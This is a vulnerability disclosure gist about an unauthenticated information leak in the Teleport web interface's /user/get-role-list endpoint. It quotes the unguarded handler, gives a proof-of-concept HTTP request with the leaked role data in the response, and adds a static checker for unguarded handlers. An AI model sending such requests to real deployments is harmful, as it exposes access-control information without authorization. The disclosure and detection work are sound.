@arleyna
Last active November 18, 2022 03:40
# The name of an affected Product
teleport
# The affected or fixed version(s).
> teleport - 3.2.2
> teleport - 3.5.6-rc6
> teleport - 3.6.3-b2
# Vulnerability Type
Unauthorized access vulnerability
# Root Cause
```
data/www/teleport/webroot/app/controller/__init__.py
```
The route table in this file includes the following paths:
```
(r'/user/group', user.GroupListHandler),
# - management page for a specific user group
(r'/user/group/(.*)', user.GroupInfoHandler),
# - [json] get the user group list (including up to 5 members per group)
(r'/user/get-groups-with-member', user.DoGetGroupWithMemberHandler),
# - [json] get the role list
(r'/user/get-role-list', user.DoGetRoleListHandler),
# - [json] set roles in batch
(r'/user/set-role', user.DoSetRoleForUsersHandler),
```
Follow the `user.DoGetRoleListHandler` handler, which is defined in:
```
data/www/teleport/webroot/app/controller/user.py
```
```
class DoGetRoleListHandler(TPBaseJsonHandler):
    def post(self):
        # The role list is fetched and returned with no check on the requester.
        err, role_list = user.get_role_list()
        if err != TPE_OK:
            self.write_json(err)
        else:
            self.write_json(TPE_OK, data=role_list)
```
The handler is missing validation: it returns the role list without any check on who is making the request.
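One way to catch this class of bug during review, as an added example that is not part of the original gist or of Teleport's code: a static check that lists HTTP handler methods which never call an authorization guard. The guard name `check_privilege`, the constant `TP_PRIVILEGE_USER_GROUP` and the class `GuardedExampleHandler` are hypothetical, and the sample source is constructed from the handler shown above.

```python
import ast

# Constructed sample. The first class mirrors the handler shown above; the
# second is hypothetical and shows what a guarded handler would look like.
SAMPLE = '''
class DoGetRoleListHandler(TPBaseJsonHandler):
    def post(self):
        err, role_list = user.get_role_list()
        if err != TPE_OK:
            self.write_json(err)
        else:
            self.write_json(TPE_OK, data=role_list)

class GuardedExampleHandler(TPBaseJsonHandler):
    def post(self):
        ret = self.check_privilege(TP_PRIVILEGE_USER_GROUP)
        if ret != TPE_OK:
            return
        self.write_json(TPE_OK)
'''

HTTP_METHODS = {"get", "post", "put", "delete", "patch"}

def calls_guard(func, guard):
    """True if the method body contains a call to self.<guard>(...)."""
    for node in ast.walk(func):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Attribute)
                and node.func.attr == guard
                and isinstance(node.func.value, ast.Name)
                and node.func.value.id == "self"):
            return True
    return False

def unguarded_handlers(source, guard="check_privilege"):
    """Return sorted 'Class.method' names of HTTP methods lacking the guard."""
    findings = []
    for cls in ast.walk(ast.parse(source)):
        if not isinstance(cls, ast.ClassDef):
            continue
        for item in cls.body:
            if (isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef))
                    and item.name in HTTP_METHODS
                    and not calls_guard(item, guard)):
                findings.append(f"{cls.name}.{item.name}")
    return sorted(findings)

if __name__ == "__main__":
    print(unguarded_handlers(SAMPLE))
```

The check only inspects each method body, so a guard enforced in a base class or a `prepare()` hook would be reported as missing and needs manual confirmation.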
# POC
Request:
```
POST /user/get-role-list HTTP/1.1
Host: 127.0.0.1:7190
Content-Length: 4
Connection: close

xx
```
Response:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.1
Content-Type: application/json; charset=UTF-8
Date: Wed, 16 Nov 2022 07:18:38 GMT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Content-Length: 293
Set-Cookie: _sid=tp_1668583118_a918a432f2b4bcf2; Path=/
Connection: close

{"code": 0, "message": "", "data": [{"id": 1, "name": "\u7cfb\u7edf\u7ba1\u7406\u5458", "privilege": 4294967295}, {"id": 2, "name": "\u8fd0\u7ef4\u4eba\u5458", "privilege": 513}, {"id": 3, "name": "\u5ba1\u8ba1\u5458", "privilege": 32769}, {"id": 4, "name": "ok\u89d2\u8272", "privilege": 1}]}
```
# Impact
Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 were discovered to contain an information leak via the /user/get-role-list web interface.
arleyna commented Nov 16, 2022

Screenshot 2022-11-16 at 15 19 47
